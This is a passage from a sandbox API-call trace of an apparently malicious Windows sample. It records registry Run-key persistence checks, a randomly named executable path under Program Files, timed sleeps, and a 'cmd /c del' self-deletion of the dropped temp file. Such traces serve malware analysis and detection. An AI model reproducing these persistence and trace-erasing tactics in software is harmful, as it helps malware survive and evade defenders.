ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0133.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0133.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0133.366] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0138.362] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x1ec) returned 0x0 [0138.362] NtEnumerateValueKey (in: KeyHandle=0x1ec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0138.362] NtClose (Handle=0x1ec) returned 0x0 [0138.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.362] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0138.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.362] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0138.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0138.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0138.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0138.401] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) Thread: id = 101 os_tid = 0xc7c Thread: id = 126 os_tid = 0xccc Thread: id = 127 os_tid = 0xcd0 Thread: id = 128 os_tid = 0xce0 Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7f1e6680" os_pid = "0xc80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xbd4" cmd_line = "/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1507 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1508 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1509 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1510 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1511 start_va = 0x4a2d0000 end_va = 0x4a31bfff entry_point = 0x4a2d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1512 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1513 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1514 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1515 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1516 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1517 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1518 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1519 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1520 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1521 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1522 start_va = 0x6f1a0000 end_va = 0x6f1a6fff entry_point = 0x6f1a0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1523 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1524 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1525 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1526 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1527 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1528 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1529 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1530 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1531 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1532 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1533 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1534 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1535 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1536 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1537 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1538 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1539 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1540 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 102 os_tid = 0xc84 [0071.305] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fd2c | out: lpSystemTimeAsFileTime=0x26fd2c*(dwLowDateTime=0xacd08a10, dwHighDateTime=0x1d3799e)) [0071.305] GetCurrentProcessId () returned 0xc80 [0071.305] GetCurrentThreadId () returned 0xc84 [0071.305] GetTickCount () returned 0x202cd [0071.305] QueryPerformanceCounter (in: lpPerformanceCount=0x26fd24 | out: lpPerformanceCount=0x26fd24*=500840814) returned 1 [0071.306] GetModuleHandleA (lpModuleName=0x0) returned 0x4a2d0000 [0071.306] __set_app_type (_Type=0x1) [0071.306] __p__fmode () returned 0x76ee31f4 [0071.306] __p__commode () returned 0x76ee31fc [0071.307] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a2f21a6) returned 0x0 [0071.307] __getmainargs (in: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c, _DoWildCard=0, _StartInfo=0x4a2f4140 | out: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c) returned 0 [0071.307] GetCurrentThreadId () returned 0xc84 [0071.307] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc84) returned 0x38 [0071.307] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c10000 [0071.307] GetProcAddress (hModule=0x76c10000, lpProcName="SetThreadUILanguage") returned 0x76c624c2 [0071.307] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.307] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.307] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fcbc | out: phkResult=0x26fcbc*=0x0) returned 0x2 [0071.307] VirtualQuery (in: lpAddress=0x26fcf3, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0071.307] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0071.307] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0071.307] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0071.307] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0071.308] GetConsoleOutputCP () returned 0x1b5 [0071.308] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0071.308] SetConsoleCtrlHandler (HandlerRoutine=0x4a2ee72a, Add=1) returned 1 [0071.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0071.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.308] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2f41ac | out: lpMode=0x4a2f41ac) returned 1 [0071.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.308] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.308] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2f41b0 | out: lpMode=0x4a2f41b0) returned 1 [0071.309] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.309] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0071.309] GetEnvironmentStringsW () returned 0x80130* [0071.309] FreeEnvironmentStringsW (penv=0x80130) returned 1 [0071.309] GetEnvironmentStringsW () returned 0x80130* [0071.309] FreeEnvironmentStringsW (penv=0x80130) returned 1 [0071.309] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ec2c | out: phkResult=0x26ec2c*=0x40) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0xe0, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x1, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x1, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x0, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x40, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x40, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x40, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegCloseKey (hKey=0x40) returned 0x0 [0071.310] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ec2c | out: phkResult=0x26ec2c*=0x40) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x40, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x1, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x1, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x0, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x9, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x4, lpData=0x26ec38*=0x9, lpcbData=0x26ec30*=0x4) returned 0x0 [0071.310] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ec34, lpData=0x26ec38, lpcbData=0x26ec30*=0x1000 | out: lpType=0x26ec34*=0x0, lpData=0x26ec38*=0x9, lpcbData=0x26ec30*=0x1000) returned 0x2 [0071.310] RegCloseKey (hKey=0x40) returned 0x0 [0071.310] time (in: timer=0x0 | out: timer=0x0) returned 0x5a3a7355 [0071.310] srand (_Seed=0x5a3a7355) [0071.310] GetCommandLineW () returned="/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" [0071.310] GetCommandLineW () returned="/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" [0071.312] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.312] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x81a28, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0071.313] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0071.313] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0071.313] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0071.313] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0071.313] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0071.313] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0071.313] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0071.313] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0071.313] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0071.313] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0071.313] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0071.313] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0071.313] GetEnvironmentStringsW () returned 0x824a0* [0071.313] FreeEnvironmentStringsW (penv=0x824a0) returned 1 [0071.313] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0071.313] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0071.313] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0071.313] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0071.313] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0071.313] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0071.313] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0071.313] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0071.313] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0071.313] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0071.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f9f8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x26f9f8, lpFilePart=0x26f9f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x26f9f4*="system32") returned 0x13 [0071.314] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0071.314] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x26f774 | out: lpFindFileData=0x26f774) returned 0x80998 [0071.314] FindClose (in: hFindFile=0x80998 | out: hFindFile=0x80998) returned 1 [0071.314] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x26f774 | out: lpFindFileData=0x26f774) returned 0x80998 [0071.314] FindClose (in: hFindFile=0x80998 | out: hFindFile=0x80998) returned 1 [0071.314] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0071.314] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0071.314] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0071.314] GetEnvironmentStringsW () returned 0x80130* [0071.314] FreeEnvironmentStringsW (penv=0x80130) returned 1 [0071.314] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.315] GetConsoleOutputCP () returned 0x1b5 [0071.315] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0071.315] GetUserDefaultLCID () returned 0x409 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a2f4950, cchData=8 | out: lpLCData=":") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fb38, cchData=128 | out: lpLCData="0") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fb38, cchData=128 | out: lpLCData="0") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fb38, cchData=128 | out: lpLCData="1") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a2f4940, cchData=8 | out: lpLCData="/") returned 2 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a2f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0071.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a2f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a2f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a2f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a2f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a2f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a2f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a2f4930, cchData=8 | out: lpLCData=".") returned 2 [0071.316] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a2f4920, cchData=8 | out: lpLCData=",") returned 2 [0071.316] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0071.317] GetConsoleTitleW (in: lpConsoleTitle=0x70888, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0071.317] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c10000 [0071.317] GetProcAddress (hModule=0x76c10000, lpProcName="CopyFileExW") returned 0x76c4ac6c [0071.317] GetProcAddress (hModule=0x76c10000, lpProcName="IsDebuggerPresent") returned 0x76c53ea8 [0071.317] GetProcAddress (hModule=0x76c10000, lpProcName="SetConsoleInputExeNameW") returned 0x76c62732 [0071.324] _wcsicmp (_String1="del", _String2=")") returned 59 [0071.324] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0071.324] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0071.324] _wcsicmp (_String1="IF", _String2="del") returned 5 [0071.324] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0071.324] _wcsicmp (_String1="REM", _String2="del") returned 14 [0071.324] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0071.326] GetConsoleTitleW (in: lpConsoleTitle=0x26f830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0071.326] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0071.326] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0071.326] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0071.328] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x26f5e8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.328] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x26e678 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.328] GetVolumeInformationW (in: lpRootPathName="C:\\", 